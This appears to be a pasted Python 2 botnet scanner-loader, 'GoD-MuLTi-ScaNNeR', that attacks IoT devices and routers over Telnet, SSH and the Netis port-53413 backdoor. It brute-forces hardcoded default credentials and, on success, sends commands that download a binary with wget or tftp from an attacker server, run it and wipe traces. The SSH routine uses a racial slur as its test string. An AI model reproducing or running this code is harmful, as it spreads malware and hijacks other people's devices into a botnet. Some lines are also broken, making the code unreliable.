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Dec 11th, 2016
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  1. #!/usr/bin/python
  2. """
  3. GoD-MuLTi-ScaNNeR(NeTiS/TeLNeT/SSH)
  4. By; Mr.Mendax
  5. """
  6. import threading, sys, time, random, socket, re, os, paramiko
  7. from Queue import *
  8. from sys import stdout
  10. if len(sys.argv) < 4:
  11. print "GoD-MuLTi-ScaNNeR\n By: LiGhT"
  12. print "Usage: python "+sys.argv[0]+" <threads(1-100)> <ips per scan(100-1000)> <list>"
  13. sys.exit()
  16. usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  17. passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  18. ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  19. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  23. url = "" # ARM4 Binary
  24. sh_file = "" # SH File
  25. commandpayload = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget || tftp -r sshd -g; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary
  27. # DONT TOUCH
  28. spawn_shell = "cat | sh"
  29. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  30. threads = int(sys.argv[1])
  31. h0h0 = int(sys.argv[2])
  32. ips = open(sys.argv[3], "r").readlines()
  33. queue = Queue()
  34. qcount = 0
  35. binary = url.split("/")
  36. binary = binary[3]
  37. ip = binary[2]
  39. for ip in ips:
  40. qcount += 1
  41. stdout.write("\r[%d] Added to queue" % qcount)
  42. stdout.flush()
  43. queue.put(ip)
  44. print "\n"
  46. def readUntil(tn, string, timeout=10):
  47. buf = ''
  48. start_time = time.time()
  49. while time.time() - start_time < timeout:
  50. buf += tn.recv(1024)
  51. time.sleep(0.01)
  52. if string in buf: return buf
  53. raise Exception('TIMEOUT!')
  55. def worker():
  56. try:
  57. while True:
  58. try:
  59. if queue.empty() == True:
  60. sys.exit(1)
  61. iplist = []
  62. h0h0h0 = h0h0 + 1
  63. print "\033[33mGathering IPs\033[37m"%(ip.rstrip("\n"))
  64. for x in xrange(h0h0h0):
  65. ip = queue.get()
  66. iplist.append(ip)
  67. print "\033[33mIP Address Obtained \033[32m%s\033[37m"%(ip.rstrip("\n"))
  68. queue.task_done()
  69. time.sleep(1.5)
  70. print "\033[36mStarting SSH Threads\033[37m"
  71. for ip in iplist:
  72. ss = sssh(ip)
  73. ss.start()
  74. time.sleep(0.009)
  75. time.sleep(1)
  76. print "\033[32mStarting Telnet Threads\033[37m"
  77. for ip in iplist:
  78. tt = ttelnet(ip)
  79. tt.start()
  80. time.sleep(0.009)
  81. time.sleep(1)
  82. print "\033[35mStarting Netis Threads\033[37m"
  83. for ip in iplist:
  84. nn = nnetis(ip)
  85. nn.start()
  86. time.sleep(0.009)
  87. time.sleep(1)
  88. except:
  89. print "\033[31mWORKER ERROR\033[37m" #will fuk up if more threads/workers then ips in list
  90. pass
  91. except:
  92. pass
  94. class ttelnet(threading.Thread):
  95. def __init__ (self, ip):
  96. threading.Thread.__init__(self)
  97. self.ip = str(ip).rstrip('\n')
  98. def run(self):
  99. try:
  100. tn = socket.socket()
  101. tn.settimeout(5)
  102. tn.connect((self.ip,23))
  103. time.sleep(0.2)
  104. hoho = ''
  105. hoho += readUntil(tn, ":")
  106. if "mdm9625" in hoho:
  107. notr00t = 1
  108. username = usernames[1]
  109. password = passwords[1]
  110. tn.send(username + "\n")
  111. elif "9615-cdp" in hoho:
  112. r00t = 1
  113. username = usernames[0]
  114. password = passwords[0]
  115. tn.send(username + "\n")
  116. if "F600" in hoho:
  117. zte = 1
  118. username = usernames[2]
  119. password = passwords[2]
  120. tn.send(username + "\n")
  121. elif "F660" in hoho:
  122. zte = 1
  123. username = usernames[2]
  124. password = passwords[2]
  125. tn.send(username + "\n")
  126. elif "F609" in hoho:
  127. zte = 1
  128. username = usernames[2]
  129. password = passwords[2]
  130. tn.send(username + "\n")
  131. if "(none)" in hoho:
  132. vizxv = 1
  133. username = usernames[3]
  134. password = passwords[3]
  135. tn.send(username + "\n")
  136. if "BCM" in hoho:
  137. BCM = 1
  138. username = usernames[1]
  139. password = passwords[1]
  140. tn.send(username + "\n")
  141. except Exception:
  142. tn.close()
  143. try:
  144. hoho = ''
  145. hoho += readUntil(tn, ":")
  146. if "assword" in hoho:
  147. tn.send(password + "\n")
  148. time.sleep(3)
  149. except Exception:
  150. tn.close()
  151. try:
  152. mp = ''
  153. mp += tn.recv(1024)
  154. if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  155. if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  156. if notr00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  157. if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  158. if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /dev/; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  159. if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O; sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  160. except Exception:
  161. tn.close()
  162. pass
  164. class nnetis(threading.Thread):
  165. def __init__ (self, ip):
  166. threading.Thread.__init__(self)
  167. self.ip = str(ip).rstrip('\n')
  168. def run(self):
  169. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  170. try:
  171. print "\033[35m[NETIS] Payload Sent %s"%(self.ip)
  172. s.sendto(loginpayload, (self.ip, 53413))
  173. time.sleep(1)
  174. s.sendto(commandpayload, (self.ip, 53413))
  175. time.sleep(1)
  176. except Exception:
  177. pass
  179. class sssh(threading.Thread):
  180. def __init__ (self, ip):
  181. threading.Thread.__init__(self)
  182. self.ip = str(ip).rstrip('\n')
  183. def run(self):
  184. x = 1
  185. while x != 0:
  186. try:
  187. username='root'
  188. password="0"
  189. port = 22
  190. ssh = paramiko.SSHClient()
  191. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  192. dobreak=False
  193. for passwd in ssh_passwords:
  194. if ":n/a" in passwd:
  195. password=""
  196. else:
  197. password=passwd.split(":")[1]
  198. if "n/a:" in passwd:
  199. username=""
  200. else:
  201. username=passwd.split(":")[0]
  202. try:
  203. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  204. dobreak=True
  205. break
  206. except:
  207. pass
  208. if True == dobreak:
  209. break
  210. badserver=True
  211. stdin, stdout, stderr = ssh.exec_command("echo nigger")
  212. output =
  213. if "nigger" in output:
  214. badserver=False
  215. if badserver == False:
  216. print "\033[36m[SSH] Command Sent %s!\033[37m"%(self.ip)
  217. ssh.exec_command("cd /tmp || cd /var/run || cd /dev; wget "+sh_file+" -O; sh; rm -rf /tmp/*")
  218. time.sleep(3)
  219. ssh.close()
  220. x = 0
  221. if badserver == True:
  222. ssh.close()
  223. except:
  224. pass
  225. x = 0
  227. for g in xrange(threads):
  228. t = threading.Thread(target=worker)
  229. t.setDaemon(True)
  230. t.start()
  231. time.sleep(0.001)
  233. queue.join()
  234. print "Finished!"
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